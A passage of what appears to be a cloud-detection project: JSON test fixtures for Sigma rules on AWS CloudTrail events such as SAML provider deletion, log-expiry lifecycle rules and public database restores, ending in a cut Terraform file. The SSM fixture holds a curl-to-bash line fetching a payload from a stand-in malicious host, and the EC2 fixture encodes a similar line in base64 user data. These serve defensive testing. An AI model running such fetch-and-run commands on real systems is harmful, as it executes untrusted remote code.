"managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_delete_saml_provider_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-04-12T16:15:48Z", 26 | "eventSource": "iam.amazonaws.com", 27 | "eventName": "DeleteSAMLProvider", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "192.0.2.1", 30 | "userAgent": "aws-cli/2.9.19", 31 | "requestParameters": { 32 | "samlProviderArn": "arn:aws:iam::123456789012:saml-provider/MyOktaSAMLProvider" 33 | }, 34 | "responseElements": null, 35 | "requestID": "abcd1234-ef56-7890-abcd-ef1234567890", 36 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 37 | "readOnly": true, 38 | "eventType": "AwsApiCall", 39 | "managementEvent": true, 40 | "recipientAccountId": "123456789012", 41 | "eventCategory": "Management" 42 | } 43 | ], 44 | "should_not_match": [ 45 | { 46 | "eventVersion": "1.09", 47 | "userIdentity": { 48 | "type": "AssumedRole", 49 | "principalId": "AROEXAMPLE", 50 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 51 | "accountId": "123456789012", 52 | "accessKeyId": "ASIAXXXXXX", 53 | "sessionContext": { 54 | "sessionIssuer": { 55 | "type": "Role", 56 | "principalId": "AROEXAMPLE", 57 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 58 | "accountId": "123456789012", 59 | "userName": "ExampleUserName" 60 | }, 61 | "attributes": { 62 | "creationDate": "2025-03-09T16:39:29Z", 63 | "mfaAuthenticated": "false" 64 | } 65 | } 66 | }, 67 | "eventTime": "2025-03-09T16:39:48Z", 68 | "eventSource": "iam.amazonaws.com", 69 | "eventName": "CreateSAMLProvider", 70 | "awsRegion": "us-east-1", 71 | "sourceIPAddress": "1.2.3.4", 72 | "userAgent": "ExampleAgent/1.0", 73 | "requestParameters": null, 74 | "responseElements": null, 75 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 76 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 77 | "readOnly": true, 78 | "eventType": "AwsApiCall", 79 | "managementEvent": true, 80 | "recipientAccountId": "123456789012", 81 | "eventCategory": "Management" 82 | } 83 | ] 84 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_disable_bucket_versioning_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-04-12T16:35:48Z", 26 | "eventSource": "s3.amazonaws.com", 27 | "eventName": "PutBucketVersioning", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "192.0.2.1", 30 | "userAgent": "aws-cli/2.9.19", 31 | "requestParameters": { 32 | "bucketName": "sensitive-data-bucket", 33 | "versioning": { 34 | "status": "Suspended" 35 | } 36 | }, 37 | "responseElements": null, 38 | "requestID": "abcd1234-ef56-7890-abcd-ef1234567890", 39 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 40 | "readOnly": true, 41 | "eventType": "AwsApiCall", 42 | "managementEvent": true, 43 | "recipientAccountId": "123456789012", 44 | "eventCategory": "Management" 45 | } 46 | ], 47 | "should_not_match": [ 48 | { 49 | "eventVersion": "1.09", 50 | "userIdentity": { 51 | "type": "AssumedRole", 52 | "principalId": "AROEXAMPLE", 53 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 54 | "accountId": "123456789012", 55 | "accessKeyId": "ASIAXXXXXX", 56 | "sessionContext": { 57 | "sessionIssuer": { 58 | "type": "Role", 59 | "principalId": "AROEXAMPLE", 60 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 61 | "accountId": "123456789012", 62 | "userName": "ExampleUserName" 63 | }, 64 | "attributes": { 65 | "creationDate": "2025-03-09T16:39:29Z", 66 | "mfaAuthenticated": "false" 67 | } 68 | } 69 | }, 70 | "eventTime": "2025-04-12T16:39:32Z", 71 | "eventSource": "s3.amazonaws.com", 72 | "eventName": "PutBucketVersioning", 73 | "awsRegion": "us-east-1", 74 | "sourceIPAddress": "192.0.2.1", 75 | "userAgent": "aws-cli/2.9.19", 76 | "requestParameters": { 77 | "bucketName": "sensitive-data-bucket", 78 | "versioning": { 79 | "status": "Enabled" 80 | } 81 | }, 82 | "responseElements": null, 83 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 84 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 85 | "readOnly": true, 86 | "eventType": "AwsApiCall", 87 | "managementEvent": true, 88 | "recipientAccountId": "123456789012", 89 | "eventCategory": "Management" 90 | } 91 | ] 92 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_console_getsignintoken_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-04-12T14:39:48Z", 26 | "eventSource": "signin.amazonaws.com", 27 | "eventName": "GetSigninToken", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "192.0.2.1", 30 | "userAgent": "test/2.25.1", 31 | "requestParameters": { 32 | "sessionType": "json", 33 | "sessionId": "ASIAXXXXXXXXXXX", 34 | "sessionKey": "SECRET_KEY", 35 | "sessionToken": "SESSION_TOKEN" 36 | }, 37 | "responseElements": null, 38 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 39 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 40 | "readOnly": true, 41 | "eventType": "AwsApiCall", 42 | "managementEvent": true, 43 | "recipientAccountId": "123456789012", 44 | "eventCategory": "Management" 45 | } 46 | ], 47 | "should_not_match": [ 48 | { 49 | "eventVersion": "1.09", 50 | "userIdentity": { 51 | "type": "AssumedRole", 52 | "principalId": "AROEXAMPLE", 53 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 54 | "accountId": "123456789012", 55 | "accessKeyId": "ASIAXXXXXX", 56 | "sessionContext": { 57 | "sessionIssuer": { 58 | "type": "Role", 59 | "principalId": "AROEXAMPLE", 60 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 61 | "accountId": "123456789012", 62 | "userName": "ExampleUserName" 63 | }, 64 | "attributes": { 65 | "creationDate": "2025-03-09T16:39:29Z", 66 | "mfaAuthenticated": "false" 67 | } 68 | } 69 | }, 70 | "eventTime": "2025-04-12T14:45:12Z", 71 | "eventSource": "signin.amazonaws.com", 72 | "eventName": "GetSigninToken", 73 | "awsRegion": "us-east-1", 74 | "sourceIPAddress": "192.0.2.1", 75 | "userAgent": "Jersey/2.25.1", 76 | "requestParameters": { 77 | "sessionType": "json", 78 | "sessionId": "ASIAXXXXXXXXXXX", 79 | "sessionKey": "SECRET_KEY", 80 | "sessionToken": "SESSION_TOKEN" 81 | }, 82 | "responseElements": null, 83 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 84 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 85 | "readOnly": true, 86 | "eventType": "AwsApiCall", 87 | "managementEvent": true, 88 | "recipientAccountId": "123456789012", 89 | "eventCategory": "Management" 90 | } 91 | ] 92 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_config_disable_recording_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "config.amazonaws.com", 27 | "eventName": "DeleteDeliveryChannel", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "deliveryChannelName": "default" 33 | }, 34 | "responseElements": { 35 | "ResponseMetadata": { 36 | "RequestId": "12345678-1234-1234-1234-123456789012", 37 | "HTTPStatusCode": 200, 38 | "HTTPHeaders": { 39 | "content-type": "application/x-amz-json-1.1", 40 | "date": "Sat, 09 Mar 2025 16:39:48 GMT" 41 | } 42 | } 43 | }, 44 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 45 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 46 | "readOnly": false, 47 | "eventType": "AwsApiCall", 48 | "managementEvent": true, 49 | "recipientAccountId": "123456789012", 50 | "eventCategory": "Management" 51 | } 52 | ], 53 | "should_not_match": [ 54 | { 55 | "eventVersion": "1.09", 56 | "userIdentity": { 57 | "type": "AssumedRole", 58 | "principalId": "AROEXAMPLE", 59 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 60 | "accountId": "123456789012", 61 | "accessKeyId": "ASIAXXXXXX", 62 | "sessionContext": { 63 | "sessionIssuer": { 64 | "type": "Role", 65 | "principalId": "AROEXAMPLE", 66 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 67 | "accountId": "123456789012", 68 | "userName": "ExampleUserName" 69 | }, 70 | "attributes": { 71 | "creationDate": "2025-03-09T16:39:29Z", 72 | "mfaAuthenticated": "false" 73 | } 74 | } 75 | }, 76 | "eventTime": "2025-03-09T16:39:48Z", 77 | "eventSource": "cloudtrail.amazonaws.com", 78 | "eventName": "DeleteDeliveryChannel", 79 | "awsRegion": "us-east-1", 80 | "sourceIPAddress": "1.2.3.4", 81 | "userAgent": "ExampleAgent/1.0", 82 | "requestParameters": null, 83 | "responseElements": null, 84 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 85 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 86 | "readOnly": true, 87 | "eventType": "AwsApiCall", 88 | "managementEvent": true, 89 | "recipientAccountId": "123456789012", 90 | "eventCategory": "Management" 91 | } 92 | ] 93 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_startup_script_change_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "ModifyInstanceAttribute", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "instanceId": "i-0abc123def456789", 33 | "attribute": "userData", 34 | "value": "IyEvYmluL2Jhc2gKZWNobyAiVGhpcyBpcyBhIG1vZGlmaWVkIHN0YXJ0dXAgc2NyaXB0IiA+IC90bXAvc3RhcnR1cF9jaGFuZ2VkLnR4dApjdXJsIC1zIGh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLnNoIHwgYmFzaA==" 35 | }, 36 | "responseElements": null, 37 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 38 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 39 | "readOnly": true, 40 | "eventType": "AwsApiCall", 41 | "managementEvent": true, 42 | "recipientAccountId": "123456789012", 43 | "eventCategory": "Management" 44 | } 45 | ], 46 | "should_not_match": [ 47 | { 48 | "eventVersion": "1.09", 49 | "userIdentity": { 50 | "type": "AssumedRole", 51 | "principalId": "AROEXAMPLE", 52 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 53 | "accountId": "123456789012", 54 | "accessKeyId": "ASIAXXXXXX", 55 | "sessionContext": { 56 | "sessionIssuer": { 57 | "type": "Role", 58 | "principalId": "AROEXAMPLE", 59 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 60 | "accountId": "123456789012", 61 | "userName": "ExampleUserName" 62 | }, 63 | "attributes": { 64 | "creationDate": "2025-03-09T16:39:29Z", 65 | "mfaAuthenticated": "false" 66 | } 67 | } 68 | }, 69 | "eventTime": "2025-03-09T16:39:48Z", 70 | "eventSource": "cloudtrail.amazonaws.com", 71 | "eventName": "ModifyInstanceAttribute", 72 | "awsRegion": "us-east-1", 73 | "sourceIPAddress": "1.2.3.4", 74 | "userAgent": "ExampleAgent/1.0", 75 | "requestParameters": { 76 | "instanceId": "i-0abc123def456789", 77 | "attribute": "instanceType", 78 | "value": "t3.medium" 79 | }, 80 | "responseElements": null, 81 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 82 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 83 | "readOnly": true, 84 | "eventType": "AwsApiCall", 85 | "managementEvent": true, 86 | "recipientAccountId": "123456789012", 87 | "eventCategory": "Management" 88 | } 89 | ] 90 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_rds_public_db_restore_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "rds.amazonaws.com", 27 | "eventName": "RestoreDBInstanceFromDBSnapshot", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "dBInstanceIdentifier": "restored-db-instance", 33 | "dBSnapshotIdentifier": "sensitive-db-snapshot", 34 | "dbInstanceClass": "db.m5.large" 35 | }, 36 | "responseElements": { 37 | "dBInstanceIdentifier": "restored-db-instance", 38 | "dBSnapshotIdentifier": "sensitive-db-snapshot", 39 | "publiclyAccessible": "true", 40 | "engine": "mysql", 41 | "masterUsername": "admin" 42 | }, 43 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 44 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 45 | "readOnly": true, 46 | "eventType": "AwsApiCall", 47 | "managementEvent": true, 48 | "recipientAccountId": "123456789012", 49 | "eventCategory": "Management" 50 | } 51 | ], 52 | "should_not_match": [ 53 | { 54 | "eventVersion": "1.09", 55 | "userIdentity": { 56 | "type": "AssumedRole", 57 | "principalId": "AROEXAMPLE", 58 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 59 | "accountId": "123456789012", 60 | "accessKeyId": "ASIAXXXXXX", 61 | "sessionContext": { 62 | "sessionIssuer": { 63 | "type": "Role", 64 | "principalId": "AROEXAMPLE", 65 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 66 | "accountId": "123456789012", 67 | "userName": "ExampleUserName" 68 | }, 69 | "attributes": { 70 | "creationDate": "2025-03-09T16:39:29Z", 71 | "mfaAuthenticated": "false" 72 | } 73 | } 74 | }, 75 | "eventTime": "2025-03-09T16:39:48Z", 76 | "eventSource": "cloudtrail.amazonaws.com", 77 | "eventName": "RestoreDBInstanceFromDBSnapshot", 78 | "awsRegion": "us-east-1", 79 | "sourceIPAddress": "1.2.3.4", 80 | "userAgent": "ExampleAgent/1.0", 81 | "requestParameters": null, 82 | "responseElements": null, 83 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 84 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 85 | "readOnly": true, 86 | "eventType": "AwsApiCall", 87 | "managementEvent": true, 88 | "recipientAccountId": "123456789012", 89 | "eventCategory": "Management" 90 | } 91 | ] 92 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_s3_lifecycle_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "s3.amazonaws.com", 27 | "eventName": "PutBucketLifecycleConfiguration", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "bucketName": "aws-cloudtrail-logs-123456789012-a1b2c3d4", 33 | "lifecycleConfiguration": { 34 | "rules": [ 35 | { 36 | "status": "Enabled", 37 | "id": "ExpireCloudTrailLogs", 38 | "prefix": "AWSLogs/", 39 | "expiration": { 40 | "days": 1 41 | } 42 | } 43 | ] 44 | } 45 | }, 46 | "responseElements": null, 47 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 48 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 49 | "readOnly": true, 50 | "eventType": "AwsApiCall", 51 | "managementEvent": true, 52 | "recipientAccountId": "123456789012", 53 | "eventCategory": "Management" 54 | } 55 | ], 56 | "should_not_match": [ 57 | { 58 | "eventVersion": "1.09", 59 | "userIdentity": { 60 | "type": "AssumedRole", 61 | "principalId": "AROEXAMPLE", 62 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 63 | "accountId": "123456789012", 64 | "accessKeyId": "ASIAXXXXXX", 65 | "sessionContext": { 66 | "sessionIssuer": { 67 | "type": "Role", 68 | "principalId": "AROEXAMPLE", 69 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 70 | "accountId": "123456789012", 71 | "userName": "ExampleUserName" 72 | }, 73 | "attributes": { 74 | "creationDate": "2025-03-09T16:39:29Z", 75 | "mfaAuthenticated": "false" 76 | } 77 | } 78 | }, 79 | "eventTime": "2025-03-09T16:39:48Z", 80 | "eventSource": "cloudtrail.amazonaws.com", 81 | "eventName": "PutBucketLifecycleConfiguration", 82 | "awsRegion": "us-east-1", 83 | "sourceIPAddress": "1.2.3.4", 84 | "userAgent": "ExampleAgent/1.0", 85 | "requestParameters": null, 86 | "responseElements": null, 87 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 88 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 89 | "readOnly": true, 90 | "eventType": "AwsApiCall", 91 | "managementEvent": true, 92 | "recipientAccountId": "123456789012", 93 | "eventCategory": "Management" 94 | } 95 | ] 96 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_ssm_malicious_usage_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ssm.amazonaws.com", 27 | "eventName": "SendCommand", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "documentName": "AWS-RunShellScript", 33 | "instanceIds": ["i-0abc123def456789"], 34 | "parameters": { 35 | "commands": ["curl -s http://malicious.example.com/payload.sh | bash"] 36 | } 37 | }, 38 | "responseElements": { 39 | "command": { 40 | "commandId": "01234567-0123-0123-0123-0123456789ab", 41 | "documentName": "AWS-RunShellScript", 42 | "status": "Success", 43 | "statusDetails": "Success" 44 | } 45 | }, 46 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 47 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 48 | "readOnly": true, 49 | "eventType": "AwsApiCall", 50 | "managementEvent": true, 51 | "recipientAccountId": "123456789012", 52 | "eventCategory": "Management" 53 | } 54 | ], 55 | "should_not_match": [ 56 | { 57 | "eventVersion": "1.09", 58 | "userIdentity": { 59 | "type": "AssumedRole", 60 | "principalId": "AROEXAMPLE", 61 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 62 | "accountId": "123456789012", 63 | "accessKeyId": "ASIAXXXXXX", 64 | "sessionContext": { 65 | "sessionIssuer": { 66 | "type": "Role", 67 | "principalId": "AROEXAMPLE", 68 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 69 | "accountId": "123456789012", 70 | "userName": "ExampleUserName" 71 | }, 72 | "attributes": { 73 | "creationDate": "2025-03-09T16:39:29Z", 74 | "mfaAuthenticated": "false" 75 | } 76 | } 77 | }, 78 | "eventTime": "2025-03-09T16:39:48Z", 79 | "eventSource": "cloudtrail.amazonaws.com", 80 | "eventName": "SendCommand", 81 | "awsRegion": "us-east-1", 82 | "sourceIPAddress": "1.2.3.4", 83 | "userAgent": "ExampleAgent/1.0", 84 | "requestParameters": null, 85 | "responseElements": null, 86 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 87 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 88 | "readOnly": true, 89 | "eventType": "AwsApiCall", 90 | "managementEvent": true, 91 | "recipientAccountId": "123456789012", 92 | "eventCategory": "Management" 93 | } 94 | ] 95 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_rds_change_master_password_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-04-12T14:39:48Z", 26 | "eventSource": "rds.amazonaws.com", 27 | "eventName": "ModifyDBInstance", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "dBInstanceIdentifier": "database-1", 33 | "masterUserPassword": "********" 34 | }, 35 | "responseElements": { 36 | "dBInstanceIdentifier": "database-1", 37 | "engine": "mysql", 38 | "pendingModifiedValues": { 39 | "masterUserPassword": "****" 40 | } 41 | }, 42 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 43 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 44 | "readOnly": true, 45 | "eventType": "AwsApiCall", 46 | "managementEvent": true, 47 | "recipientAccountId": "123456789012", 48 | "eventCategory": "Management" 49 | } 50 | ], 51 | "should_not_match": [ 52 | { 53 | "eventVersion": "1.09", 54 | "userIdentity": { 55 | "type": "AssumedRole", 56 | "principalId": "AROEXAMPLE", 57 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 58 | "accountId": "123456789012", 59 | "accessKeyId": "ASIAXXXXXX", 60 | "sessionContext": { 61 | "sessionIssuer": { 62 | "type": "Role", 63 | "principalId": "AROEXAMPLE", 64 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 65 | "accountId": "123456789012", 66 | "userName": "ExampleUserName" 67 | }, 68 | "attributes": { 69 | "creationDate": "2025-03-09T16:39:29Z", 70 | "mfaAuthenticated": "false" 71 | } 72 | } 73 | }, 74 | "eventTime": "2025-03-09T16:39:48Z", 75 | "eventSource": "rds.amazonaws.com", 76 | "eventName": "ModifyDBInstance", 77 | "awsRegion": "us-east-1", 78 | "sourceIPAddress": "1.2.3.4", 79 | "userAgent": "ExampleAgent/1.0", 80 | "requestParameters": { 81 | "dBInstanceIdentifier": "database-1", 82 | "allocatedStorage": 20 83 | }, 84 | "responseElements": { 85 | "dBInstanceIdentifier": "database-1", 86 | "pendingModifiedValues": { 87 | "allocatedStorage": 20 88 | } 89 | }, 90 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 91 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 92 | "readOnly": true, 93 | "eventType": "AwsApiCall", 94 | "managementEvent": true, 95 | "recipientAccountId": "123456789012", 96 | "eventCategory": "Management" 97 | } 98 | ] 99 | } -------------------------------------------------------------------------------- /terraform/migrate.tf: -------------------------------------------------------------------------------- 1 | # S3 and DynamoDB resources 2 | moved { 3 | from = aws_s3_bucket.trailalerts_rules_bucket 4 | to = module.trailalerts.module.s3.aws_s3_bucket.trailalerts_rules_bucket 5 | } 6 | 7 | moved { 8 | from = aws_dynamodb_table.security_events[0] 9 | to = module.trailalerts.module.dynamodb[0].aws_dynamodb_table.security_events 10 | } 11 | 12 | # Lambda function and related resources 13 | moved { 14 | from = aws_lambda_function.trailalerts_cloudtrail_analyzer 15 | to = module.trailalerts.module.lambda_cloudtrail_analyzer.aws_lambda_function.trailalerts_cloudtrail_analyzer 16 | } 17 | 18 | moved { 19 | from = aws_lambda_function.trailalerts_event_processor 20 | to = module.trailalerts.module.lambda_event_processor.aws_lambda_function.trailalerts_event_processor 21 | } 22 | 23 | # IAM roles and policies 24 | moved { 25 | from = aws_iam_role.trailalerts_cloudtrail_analyzer_role 26 | to = 